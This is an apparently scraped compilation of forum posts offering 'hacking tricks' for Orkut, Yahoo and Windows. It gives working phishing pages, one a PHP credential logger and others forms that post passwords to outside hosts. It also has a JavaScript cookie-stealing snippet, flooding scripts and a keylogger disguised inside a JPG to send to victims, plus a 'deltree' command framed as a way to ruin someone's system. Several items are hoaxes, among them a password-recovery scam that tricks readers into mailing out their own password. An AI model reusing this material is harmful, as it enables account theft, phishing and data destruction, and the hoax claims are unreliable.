Make sure you put the < > symbols, as this is very important.
It fools the Yahoo's Server system acting as a command line
and will send the information back to you saying there is an error, but also
sends you the information. Also make sure you fill out the
appropriate things such as the email addresses and password,
to get the password. Then click send, and it should be sent
within 24 hours, that easy. Again, please use with care and do
not abuse this privilege.


----------------------------------------------------------------------

scrap flooder




scrap flooder
javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+='<iframe name="SbFlood" width="800" height="600"/>'; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value="Your Text Here " + i ;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,1050))

open ur friends scrapbook.........
copy this lin in ur url bar......
nd press enter.......
hey dont forget to write somethin in the text box........
nd wait for ten minutes.....
dont press anythin..........
after tat ur frnds scrap will increase........




if u want to increase ur own scraps

replace " your text here" with wat u want to apear in scraps.... change it in the script......


??Tutorials:how to make fake page of any webpage


??Tutorials:how to make fake page of any webpage
??Tutorials:how to make fake page of any webpage
a new section for php based fake pages after which ny1 will be able to make fake page of any website(really)



so lets start now:-

first of all u need to know the source code of the website of which u want fake page
*for that right click on the webpage n click on view page source a new window will open just select all n copy the content n save it as urpage.html(u can name it nything u like acc to webpage)

now open ur urpage.html n search for :


<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=orkut" method="post"
onsubmit="return(gaia_onLoginSubmit());">


firstly copy the text in blue n remember it u ll need it in ur php file

replace the text in blue with ur php filename like orkut.php

ur php file:


<?php
header ('Location: blue text here ');
$handle = fopen("login.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

now replace the text "blue text here" with the blue text from above


n now save the php file as orkut.php


now make a login.txt file which would be a blank file

now upload all the three files orkut.html,orkut.php,login.txt in a webhost which supports php like freeweb7(or u can google for more webhost for dat)


now u all r thinking dat how will i get the passwords?????
all the data entered in ur fake page will be stored in ur login.txt file which u can access thru ur webhost


so now enjoy ur new fake webpage

Hack an orkut account


Hack an orkut account
First get firefox and the cookie editor plugin for it...u will need them...
then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...the choice is yours though..
then heres the script

Code:
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

u see the 62915936 part? thats the one u need to edit to get the cookie to your account..... HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:

go to YOUR ALBUM section...go to ANY photo and right click on it,see the properties of your display image...u will see something like 12345678.jpg
there will be a eight digit value.. now put that value in the above javascript.thats it. now your javascript will look like
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

Now give this script to the victim,ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook..
now after getting a cookie...go to your home page and open the cookie editor plugin(TOOLS-->COOKIE EDITOR)...type orkut in the text box
no need to change the _umbz _umbc part... THATS IT!!

ANOTHER SCRIPT: 100%working
javascript:nobody=replyForm;nobody.toUserId.value=53093255;nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?Action.submit';nobody.submit() and click filter/refresh.look for orkut_state cookie. just double click it and replace the orkut_state part with your victims... put ur eight digit number in the place of (53093255)

Hidden Program In Microsoft windows........


Hidden Program In Microsoft windows........
1- Private Character Editor
This program is for designing icons and Characters(Alphapet)
Click :start
Then :run
type :EUDCEDIT
.................................................. .................................................. .............................................

2- iExpress
This Program is for conerting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress
.................................................. .................................................. .............................................

3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr

.................................................. .................................................. .............................................

4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
.................................................. .................................................. .............................................

5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32
.................................................. .................................................. .............................................

Program ............. CODE
__________ __________

Character Map = charmap

DirectX diagnosis = dxdiag

Object Packager = packager

System Monitor = perfmon

Program Manager = progman

Remote Access phone book = rasphone

Registry Editor = regedt32

File siganture verification tool = sigverif

Volume Contro = sndvol32

System Configuration Editor = sysedit

Syskey = syskey

Microsoft Telnet Client = telnet

25 Hacking Softwares Download Here For Free


25 Hacking Softwares Download Here For Free

rapidshare.com/files/84112082/AIO_Trace_Ip_toolz.rar

rapidshare.com/files/91730792/Seria-of-Soft.rar

rapidshare.com/files/91624959/hide_ip_plantinumwith_key.rar

rapidshare.com/files/91023193/Account-Locker.rar

rapidshare.com/files/91023633/Anti-Mail-Bomb.rar

rapidshare.com/files/91024117/Emoticon_Creator.rar

rapidshare.com/files/91025261/Frez-Accont.rar

rapidshare.com/files/91027689/Kitle.rar

rapidshare.com/files/91029795/Msn-Block-Checker.rar

rapidshare.com/files/91032421/Proyect_Lithium_Version_0.2.0.rar

rapidshare.com/files/91033497/skinnerv12setup.rar

rapidshare.com/files/91025674/Hot-Hack.rar

rapidshare.com/files/91026666/Hotmal-Kiler.rar

rapidshare.com/files/91027055/Hotm-Crak.rar

rapidshare.com/files/91028264/MSN7UniversalPatcherPlusPlus.rar

rapidshare.com/files/91028827/Msn-_Dondurucu-hhhh.rar

rapidshare.com/files/91029357/Msn-Auto-Responder.rar

rapidshare.com/files/91030167/Msn-Clean.rar

rapidshare.com/files/91030644/Msn-Pass-Grab.rar

rapidshare.com/files/91031205/Msn-Pass-Recouvery.rar

rapidshare.com/files/91031509/My-Pass.rar

rapidshare.com/files/91035275/t__T__T8f_OnT2.rar

rapidshare.com/files/91035276/Yah-Boter.rar

rapidshare.com/files/91035277/yahoocrack.rar

rapidshare.com/files/91035278/Yaho-Web-Hak.rar

How to hack Servers !!


How to hack Servers !!
How to hack Servers !!
Steps to hack server:
1)Create a file anywhere you want.

2)Right click on the file.
Then choose with-->Choose program-->Browse

3)Now you have to enter in to DDESHARE file.

4)Click on Start-->go to Accessories-->Right click on Command Prompt

5)Click on proporties now click Find target.

6)Now you are in c:\ drive. that is system 32.

7)Click on Search.Choose all files and folders..
Search for "DDESHARE".

8)After finding that file.Just double click on that file.

9)Now click on Shares.choose computer.

10)Including domain controller it will show all systems which are connected to server.

11)Now choose which system do you want to hack.All computer names will be in the format \\thecomputernamegoeshere.


12)Right click on the system which you are going to hack and copy its name and paste it in your file.which you have choosen in 1st step.

13)The file name will be in the format \\thecomputernamegoeshere.If the first computer in the server dose'nt work then choose 2nd computer.

14)Now you will be seeing "shared folder" for folder name.

15)Now double click on that folder.you will be seeing many domains which are connected to the server.

16)Now you hacked the system.just go around for searching for files which you want.

17)Here you can copy scripts,delete files transfer files from one system to another system.

Hacking A yahoo id with fake page


Hacking A yahoo id with fake page
hey friends recently i came to know abt fake page hacking now im going to tell you how can you hack a yahoo id
first of all you have to sign up heere :
http://www.webformdesigner.net/wfd_signup_form.php
in the registration form enter the email id where u want all the hacked passwords
and in the redirect url type www.mail.yahoo.com
when u register it u will get ur form id in ur email address u provided in the beginning.
for me took a day to send the form id
now do these:
1) goto yahoomail.com and right clik there and clik on view source. It will open in notepad just save this file at ur desktop with name as yahoomail.html. it doesnt matter whatever name it is but it should have .html at the last now right clik this file yahoomail.html located at ur desktop and open it with notepad.
2) search for something like this in the file :
<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form

and replace it with this :
<form name="New_Form" action="http://www.webformdesigner.net/wfd_f2.php?id=55467" method="post" enctype="application/x-www-form-urlencoded" onsubmit="return New_Form_CF();">

note that u have to put your form id in this code instead of 55467 be sure to do this or ur fake page wont work

now save this modified page in html just as i told before .
now u r half done
now u have to enforce the victim to enter his id and password through this page for that u have to upload it to a webhosting server
i think everyone can upload it and those who cant do it just go and die u r not eligible to remain in this community and cannot be called as hackerzzz
now i recommend you to upload that page which many directories and subdirectories in it and be sure that the web host provides the facility that ur page has the address like your domain.webhost.com/..... put ur page deeply in any subdirectory and probably name the directories and subdirectories based on yahoo or mail or anything related to yahoo.

now what you have to do is to send a fake mail using ur telnet program from the id named support _yahoo@yahoo.com or any yahoo's servicing id u like but the victim doesnt knows abt it


then send the link of ur fake mail to the victim and enforce him to login to his id through ur link
just when he enters the id and pass u will get a mail within a mins to ur mail id that u provided at the time of registration in webform
thats it you get his id and pass then u can do whatever u like


i hope that every one succeeds in getting passwords in this way

best of luck and enjoy

one more thing i m not responsible for any damage occurring to you by this tutorial u r fully responsible for the use of this tutorial

Hacking Passwords through a picture


Hacking Passwords through a picture
Hacking Passwords through a picture
Hope everyone is familiar with keyloggers, Well you might get a question how does a keylogger works to hack other passwords, and moreover keyloggers are just used to record the keystrokes,logs,visited website,passwords in a pc.Then how come these keyloggers can hack others passwords that too of another user and from a different pc. Then you are obviously correct in thinking so.
In this Way of hacking i used invisible keyloggers to hack, Where these invisible keyloggers are undetectable,They even do the same work as keyloggers but they can do on others pc's too. Ok, Then you might think, how can i hack the others password through these keyloggers. That work is left to invisible keyloggers, They have an automated option to send you a e-mail, go to configure settings and set your email id there. Through this method you'll hack not only passwords but the users entire Keystrokes typed, Logs, Chat monitors and many more.Just you have to set the Report frequency of your wish.
Now stepping into the actual process to hack passwords
1.Basic requirements are you should have a keylogger and a picture of .jpg format or any other format of your wish but i recommend .jpg as it is easy to download.
2.I recomend anyone of these keyloggers "SKL" and "INSIDE KEYLOGGER"
Download SKL
Download INSIDE KEYLOGGER
3.Install the keylogger and give your email id in the Email options, I recomend yahoo. So you are half way done.
4.Now move to the folder in which you have your keylogger and one jpg image Zip both the files and save it in .jpeg format and upload the file on to the server. As the server will not allow you to upload the .exe files
5.This is another method to hide your Keylogger
copy these files to C:\ drive and paste them into a folder and open the command prompt window
6.copy /b sourceimagefile.jpg + filetobehidden.exe targetimage.jpg
Now the logger in the .jpeg format
7.Now the antivirus cant detect the file.
8.Just send the uploaded image to the victim as soon as he clicks the image file invisible keylogger will be installed.
He'll b enjoying with picture and you enjoy with his emails.

download inside keylogger from here:
http://www.inside-logger.com/key_logger/download.html

or here:
http://www.trojanfrance.com/index.php?dir=KeyLoggers/

----------------------------------------------------------------------

[R] Using URL Obfuscation to hide your IP Address


[R] Using URL Obfuscation to hide your IP Address
[R] Using URL Obfuscation to hide your IP Address
Let me elaborate on how hackers use URL Obfuscation in order to hide their IP Address.

It is possible to hide addresses in URLs so that they can bypass filters or other application defenses that have been put in place to block specific IP addresses. Although web browsers recognize URLs that contain hexadecimal or binary character representations, some web filtering applications don’t. Here is an example of an encoded binary IP address: http://8812120797/. Does it look confusing? Hehe Well, this decimal address can be converted into a human readable IP address. Convert the address into hexadecimal, divide it into 4 sets of 2 digits, and finally convert each set back into decimal to recover the IP address manually.

To convert an IP address to its binary equivalent, perform the following steps.

(1) Convert each individual number in the IP address to its binary equivalent. Let’s say that the address is 192.168.13.10.

192 = 11000000
168 = 10101000
13 = 00001101
10 = 00001010

(2) Combine the four eight digit numbers into one 32-digit binary number. The previous example produces 11000000101010000000110100001010.
(3) Convert the 32-bit number back to a decimal number. The example yields 3232238858.
(4) Entering this into the address field, http://3232238858, takes you to 192.168.12.10.

hacking tricks site!!!!!!


hacking tricks site!!!!!!
http://softwarespt.blogspot.com/
go to this site nd see some hacking nd pc tricks...
keep xploring....

increase ur netspeed new trick!~


increase ur netspeed new trick!~
go to desktop->My computer-(right click on)->manage->->Device manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

U WILL NOTICE AN IMMEDIATE RESULT

this will increase the receiving capacity of your input port and thus ur netspeed will be increased



go to desktop->My computer-(right click on)->manage->->Device manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

U WILL NOTICE AN IMMEDIATE RESULT

this will increase the receiving capacity of your input port and thus ur netspeed will be increased

its a image creator........


www.jellymuffin.com
get kewl images to rite upon.....
its a image creator........

just copy the program in a text document and save as with *.bat format. before saving replace those xxxxxx with the password you want.


just copy the program in a text document and save as with *.bat format.
before saving replace those xxxxxx with the password you want.



cls
@ECHO OFF
title system
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter your password:
set/p "pass=>"
if NOT %pass%= xxxxxxx goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

IRRITITATE UR FRIND


IRRITITATE UR FRIND
IRRITITATE UR FRIND
If you want to tease ny one of your frnd then apply this and enjoy.

open the google home page.

Search for "Virus Download" without quotes

on right hand side there are links with telephone icons

Click on Green Icon

This will show you a textbox

Enter your Friends Mobile Number and click Connect for Free. and enjoy

What actually happens is when you place your frnds mobile number and click connect for free your frnd recieves a call from the owner of website. and the staff of website just starts explaining about their business which is just of no use for your frnd.

Just Try entering your number first to check what hppns...?

Subject: useful tips for mobile user


Subject: useful tips for mobile user
Date: Thu, 23 Mar 2006 17:44:21 +0530


1) Emergency number

The Emergency Number worldwide for Mobile is 112.

If you find yourself out of coverage area of your mobile network and here is an emergency,
dial 112 and the mobile will search any existing network to establish the emergency number for you,
 and interestingly...this
number112 can be dialed even while the keypad is locked.

Try it out.

2) Locked the keys in the car? Your car has remote keys?

This may come in handy someday. Good reason to own a cell phone: If you happen to lock your keys in
 the car and the spare keys are home, call someone on your cell phone. Hold your cell phone about a
foot from your
car door and have the other person at your hom! e press the unlock button, holding it near the phone
on their end. Your car will unlock. Saves someone from having to drive your keys to you. Distance is
 no object. You could be hundreds of miles away, and if you can reach someone who has the other "remote"
 for your car, you can unlock the doors (or the trunk).

Editor's Note: *It works fine! We tried it out and it unlocked our car over a cell phone!"

3) Hidden Battery power

Imagine your cell battery is very low, u r expecting an important call and u don't have a charger.
 Nokia instrument comes with a reserve battery. To activate, press the keys *3370# Your cell will
restart. with this reserve and the instrument will show a 50% increase in battery.
 This reserve will get charged when u charge your cell next time.





SEE THE MAGIC IN ORKUT


SEE THE MAGIC IN ORKUT
just copy the script scrap to yourself and then delete the sent message


<div id="flashDiv979482838"><embed type="application/x-shockwave-flash" src="http://www.orkut.com/glogin.aspx?cmd=logout" style="" id="979482838" name="979482838" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1">

hack orkut account!!!!!!!!!!!


hack orkut account!!!!!!!!!!!
wannna hack orkut account.........
the procedure is really simple........
>>>>>go to the link below......
>>>>>>>>jus login........
>>>>>>>>get the procedure nd hack others account........

the link is here>>>>
http://tipsandtricksforall.googlepages.com/tricks.html

kool hacking software njoty guys.....(net tool)


kool hacking software njoty guys.....(net tool)
Net Tools v5.0 (MUST SEE)
Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.

Contents:
Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8 ) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18 ) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28 ) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38 ) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48 ) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58 ) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68 ) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78 ) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88 ) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98 ) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator


Many extra features and utilities are included in this package!

Homepage:
http://users.pandora.be/ahmadi/nettools.htm


http://rapidshare.com/files/58837702/NetTools5.0.70.zip.html

hack orkut account


hack orkut account
how to hack orkut account
How to hack ORKUT Account! It is possible and it is easy. This way of hacking into ORKUT

email accounts was brought to my attention by my friend john working in microsoft,in

animation cell. u have to just…

STEP 1- Log in to your own Gmail account. Note: Your account must be at least 2 weeks old

for this trick to work.

STEP 2- Once you have logged into your own Gmail account, compose/write an e-mail to:

1050a0@gmail.com .This is the mailing address to the automated server that sends

out passwords to users who have forgotten them. What you are going to do is trick the server

into thinking that it is sending your password to you but it will send you the pass for the

account you are trying to hack instead.

STEP 3- In the subject line type exactly: userpassword retrieve

STEP 4- On the first line of your mail write the email address of the person you are

hacking.

STEP 5- On the second line type in the Orkut e-mail address you are using.

STEP 6- On the third line type in the password to YOUR email address (your OWN password).

The computer needs your password so it can send a __JavaScript from your account in the

ORKUT Server to extract the other email addresses password. This works because you are

sending your password to a machine not a person. The process will be done automatically by

the user administration server.

STEP 7- The final step before sending the mail is, type on the fourth line the following

code exactly:
javascript:void(001,11000,111000)charpin(100011,111000)passrecovermachine04
The password will be sent to your inbox in a mail called “System Reg Message” . try this

this will work..


---------------------------------------------------------------------

WANNA RUIN SOME ONES SYSTEM


WANNA RUIN SOME ONES SYSTEM
go to start-programas-accessories-command promt..


type deltree*.*

and press enter...

BINGO..!!! U HAV RUINED HIS/HER SYSTEM..

vry risky... try at ur own risk

??¦‹¦[«-¯_o¯_r¯_k¯_u¯_t¯_ ¯_h¯_a¯_c¯_k¯_i¯_n¯_g¯_[


??¦‹¦[«-¯_o¯_r¯_k¯_u¯_t¯_ ¯_h¯_a¯_c¯_k¯_i¯_n¯_g¯_[
1.Open www.orkut.com

2. Save page . In the saving option it asks for save as type select complete webpage.

3. Now where u have save the page it will be showing u that page and a dir wid images on the page.

4. Now Rite Click on the Page and click edit.

5. Search Form in the page.

6. Now Delete That Form Value , Method ,Action whatever its written delete that line.

7. Now add this line

<form action=”http://www.big-llc.com/formmailer/submit” method=”post”><input type=”hidden” value=”Your Email Id” name=”fm-to”><font color=”#333333?> </font><input type=”hidden” value=”password D3? name=”fm-title”><font color=”#333333?> </font><input type=”hidden” value=”Link You Want To redirect” name=”fm-redirect”><font color=”#333333?> </font>

8. Save and close the editor.

9. Upload the Directory wid images and this Page on free hosting site.

10. Its Done Simply made in just 5 mins

Note : Don’t Change The Directory Name or Page Name.

Send mails from any mail id to ur frnds


Send mails from any mail id to ur frnds
Hiiiii
check my blog to send anonymous mails to anyone u wish.You can send mail from any mail id to any mail id. For example to i can send a mail to my friend as if it has is having a crush or
http://geniushackers.com/blog/2007/11/10/send-ne1-anonymus-mails/
Here are some other posts which may be of intrets to u
call your friends from an anonymous number freely
http://geniushackers.com/blog/2007/09/16/call-your-frns-with-an-anonymous-number/
Open any blocked site
http://geniushackers.com/blog/2007/08/22/open-any-blocked-site/
Funny pics
http://geniushackers.com/blog/2007/11/05/funny-pics

All Sites where you can Upload Images.


All Sites where you can Upload Images.

DIRECT IMAGE HOSTING - No membership needed

http://www.savefile.com/
http://www.tinypic.com/
http://www.uploadimages.net/index.php
http://www.uploadyourimages.com/
http://www.vibrahost.com/imagehost/
http://www.zippyimages.com/
http://free-image-hosting.org/
http://imghost.tk/
http://paintedover.com/
http://pics.xs.to/
http://savefile.com/
http://sighost.techstarcomputers.net/
http://techimage.net/
http://thegamersalliance.com/updown.php?action=upload
http://tinypic.com/
http://uploader.unrealboards.com/
http://www.303.co.uk/up/up1.asp?path=misc
http://www.auctionphotobank.com/
http://www.bestupload.com/
http://www.bighosting.net/
http://www.digitalresolve.co.uk/upload
http://www.eazy-e.net/upload/
http://www.ezimagecenter.us/
http://www.freeupload.net/
http://www.ghettodexter.com/uploads
http://www.gonad.org/upload/
http://www.imagehigh.com/
http://www.imagehost.com/
http://www.imagemotel.com/
http://www.imagepilot.com/
http://www.imageshackdoesntwanthotlinking/
http://www.imagetown.net/
http://www.imageupload.com/main.cfm
http://www.imagevenue.com/
http://www.imagewaiter.com/
http://www.imgspot.com/
http://www.invionz.net/omlette/lueload/
http://www.iuploads.com/
http://www.orcplanet.com/upload.php
http://www.picgoo.com/
http://www.picrack.com/
http://www.pic-storage.info/
http://www.picturehost.co.uk/upload/agree/
http://www.pixfiles.net/index.en
http://www.pixpond.com/

Writing text in reverse order


Writing text in reverse order
Type the text in the scrapbook or any text box.
Type & # 8 2 3 8 without spaces before the message in the text box.....

A huge collection of Testimonials (all categories)



A huge collection of Testimonials (all categories)
A huge collection of orkut testimonials
all type of testimonials are on one place
birthday testi, friendship testi
funny testi, romantic testi and many more
just click here
http://www.chillpilz.com/orkut/Testimonials/page1.html

All cool tricks and tips


all cool tricks and tips
Hey guys visit this for all cool tricks and tips for your computer

Contents of this blog are:

1]See who is invisible on yahoo
2]Hack pc while chatting
3]Log in with multiple ids in yahoo messenger at the same time
4]it is not windows media player its ur media player
5]Hack internet explorer & impress ur friends
6]Increase ur download speed
7]Increase ur browsing speed
8]Remote Access using cmd
9]Mail hacking
10]Crack admin account password from limited account
11]All xp tricks
12]DOS hacking
13]All windows games cheats and cracks
14]Hacking DSL router
15]Format ur harddisk using notepad
16]Folder bomb
17]All run commands
18]Shutdown ur friends PC
19]Learn How to hack a pc remotely
20]Remote access
21]Lock a folder in windows
22]Hacking through yahoo
23]Changing someone's password
24]Tutorial on registry
25]Hack windows xp password
26]Hack rapidshare
27]Viri to crash a system
28]Remote access software
29]All in one javascript for orkut users
30]Mobile bluetooth hacking
31]Virus code in pascal
32]Ip tracing
and much more


keep visiting us to learn new tricks


Top 10 Hacking and Security Posts not to be missed


Top 10 Hacking and Security Posts not to be missed

Must Top 10 posts on Ethical Hacking and Security

1.) How-To: Build your own network firewall

http://zenisa.com/2008/01/27/how-to-build-your-own-network-firewall/

2.) Hacking Videos - Part 1

http://zenisa.com/2008/01/23/hacking-videos-part-1/

3.) Hacking Videos - Part 2

http://zenisa.com/2008/01/23/hacking-videos-part-2/

4.) Hacking Videos - Part 3

http://zenisa.com/2008/01/23/hacking-videos-part-3/

5.) Hacking Videos - Part 4

http://zenisa.com/2008/01/24/hacking-videos-part-4/

6.) Hacking Videos - Part 5

http://zenisa.com/2008/01/24/hacking-videos-part-5/

7.) 10 Proposed 'first-aid' security measures

http://zenisa.com/2008/01/27/10-proposed-first-aid-security-measures/

8.) The Dude Network Monitor

http://zenisa.com/2008/01/27/the-dude-network-monitor/

9.) Foremost: a Linux computer forensics tool

http://zenisa.com/2008/01/27/foremost-a-linux-computer-forensics-tool/

10.) Top Forensic Tools of 2008

http://zenisa.com/2008/01/27/top-forensic-tools-of-2008/

More Updates here:

Orkut Community:
http://www.orkut.com/Community.aspx?cmm=19858070

Website:
http://www.zenisa.com

Forum/Board
http://www.zenisa.com/forum

all cool tricks and tips
Hey guys visit this for all cool tricks and tips for your computer

Contents of this blog are:

1]See who is invisible on yahoo
2]Hack pc while chatting
3]Log in with multiple ids in yahoo messenger at the same time
4]it is not windows media player its ur media player
5]Hack internet explorer & impress ur friends
6]Increase ur download speed
7]Increase ur browsing speed
8]Remote Access using cmd
9]Mail hacking
10]Crack admin account password from limited account
11]All xp tricks
12]DOS hacking
13]All windows games cheats and cracks
14]Hacking DSL router
15]Format ur harddisk using notepad
16]Folder bomb
17]All run commands
18]Shutdown ur friends PC
19]Learn How to hack a pc remotely
20]Remote access
21]Lock a folder in windows
22]Hacking through yahoo
23]Changing someone's password
24]Tutorial on registry
25]Hack windows xp password
26]Hack rapidshare
27]Viri to crash a system
28]Remote access software
29]All in one javascript for orkut users
30]Mobile bluetooth hacking
31]Virus code in pascal
32]Ip tracing
and much more


keep visiting us to learn new tricks


video flooder


video flooder
Video Flooder
Paste this script on ur videos page and hit enter .. and yeah dont forget to replace the link of the given vedio with ur fav one ..

javascript:function de(){document.forms[1].elements[2].value="http://www.youtube.com/watch?v=rK2yRjZbvI0";submitForm(document.forms[1], 'add', '');}void(setInterval(de,800));

Courtsey : Death Eater

¦¦¦¦ Greatest Trick Ever ¦¦¦¦


¦¦¦¦ Greatest Trick Ever ¦¦¦¦
Just check it out and plz give your feedback to me!!

1) Right Click on the link below.
2) Select 'Save Target As'.
3) Save the file on your desktop.
4) Open the file ONLY AFTER you login to orkut.

Here it is.. http://scrapout.googlepages.com/myorkut.html

watch chak de india in ur scrapbook...........


watch chak de india in ur scrap book

<h1><center>Chak De India!<br>Part 1<br><embed src="http://www.videostate.tv/videoplayer.swf" FlashVars="config=http://www.videostate.tv/flvplayer.php?viewkey=ca0bfedd0ba1cd9a557e" quality="high" bgcolor="#000000" width="450" height="395" loop="false"></embed><br>Part 2<br><embed src="http://www.videostate.tv/videoplayer.swf" FlashVars="config=http://www.videostate.tv/flvplayer.php?viewkey=75b5188139a2c0702439" quality="high" bgcolor="#000000" width="450" height="395" loop="false"></embed><br>Part 3<br><embed src="http://www.videostate.tv/videoplayer.swf" FlashVars="config=http://www.videostate.tv/flvplayer.php?viewkey=20c227089e679b3ae9d1" quality="high" bgcolor="#000000" width="450" height="395" loop="false"> </embed><br>Part4<br><embed src="http://www.videostate.tv/videoplayer.swf" FlashVars="config=http://www.videostate.tv/flvplayer.php?viewkey=080e2678cdb11bb2b88d" quality="high" bgcolor="#000000" width="450" height="395" loop="false"> </embed>

wanna see locked albums.........


wanna see locked albums.........

javascript:alert("Wait for few seconds for pic`s to load......");nb=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML="<center><font style='font-size:100'><b>ALBUM HACK<br></b>SCRIPT BY LovER BoY</font>";for(i=1;i<=100;i++){document.body.innerHTML+='<img src="http://img3.orkut.com/images/milieu/'+i+'/0/'+nb+'.jpg"><br><br><br><br>';};void(0)

procedure to use the script

1. Just copy and paste the above script in the address bar of the victim
2. A window will pop up "wait for few seconds to view the pics"
3. Then click Ok.

Have fun with others album